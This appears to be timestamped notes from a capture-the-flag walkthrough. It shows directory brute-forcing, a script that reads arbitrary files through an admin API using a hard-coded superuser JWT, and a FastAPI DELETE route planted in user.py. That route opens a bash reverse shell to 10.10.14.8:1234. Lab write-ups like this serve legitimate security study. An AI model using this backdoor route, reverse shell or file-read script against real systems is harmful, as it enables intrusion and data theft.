You need to read the Python code and find where the files are.
Fun Box!
Now I'm using a server with 4GB memory, as 2GB memory is not enough.
I wonder how much AWS will charge me…
00:24 feroxbuster
I ran feroxbuster and dirb.
Feroxbuster showed results before dirb did, so I canceled dirb.
feroxbuster | Kali Linux Tools
sudo apt install feroxbuster
feroxbuster -u http://10.10.11.162 --force-recursion -C 404,405 -m GET,POST
./feroxbuster -u http://10.10.11.162 -H "Accept: application/json" -H "Authorization: Bearer {token}"
curl https://10.10.11.162 \
  -H "Accept: application/json" \
  -H "Authorization: Bearer {token}"
04:45 get_file.sh
Encode the input filename as base64url, then run the curl command against the admin file endpoint.
#!/bin/bash
# Usage: ./get_file.sh <path-on-target>
# Superuser access token obtained earlier
JWTTOKEN=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0eXBlIjoiYWNjZXNzX3Rva2VuIiwiZXhwIjoxNjYxNDc0MjAyLCJpYXQiOjE2NjA3ODMwMDIsInN1YiI6IjEyIiwiaXNfc3VwZXJ1c2VyIjp0cnVlLCJndWlkIjoiNmUwM2MyM2EtMjYyNy00ZWY0LWI0M2QtNWMyY2Q3ZGJmOWM0In0.bxxO2p3VQGpHFfeK7lLAOmJNBo_gzf8otN1--BhKQCw
# base64url: standard base64 without line wrapping (-w0), '+' -> '-', '/' -> '_', '=' padding stripped
base64_url=$(echo -n "$1" | base64 -w0 | tr '/+' '_-' | tr -d '=')
# Fetch the file and print only the "file" element as raw text
curl -s "http://10.10.11.162/api/v1/admin/file/${base64_url}" -H "Authorization: Bearer $JWTTOKEN" | jq -r .file
+ and / are special characters in a URL, so replace them with - and _ respectively (the base64url alphabet), as below.
echo -n "6+6is_f/ine-T" | tr '/+' '_-'
6-6is_f_ine-T
Then strip the trailing = padding.
jq makes the JSON response readable.
The .file filter selects only the file element; -r prints the raw string, so the escaped \n sequences in the JSON become real line breaks.
06:30 JSON escape
Free Online JSON Escape / Unescape Tool - FreeFormatter.com
A free online tool to escape or unescape JSON strings
06:38 Prepare script to send user.py
# Route appended to the app's user.py; `router` and `Any` are assumed to be already defined there, since the snippet uses them
@router.delete("/ReverseShell", status_code=200)
def exe_reverse() -> Any:
    """
    exec reverse shell
    """
    import os
    # Connect back to the attacker's listener (10.10.14.8:1234) with an interactive bash
    os.system("bash -c 'bash -i >& /dev/tcp/10.10.14.8/1234 0>&1'")
    return
@router.get did not work. I guess GET expects some output; then PUT should expect input, etc. DELETE was the right one.
07:18 sudo -l & PAM-Wordle
find / 2>/dev/null | grep wordle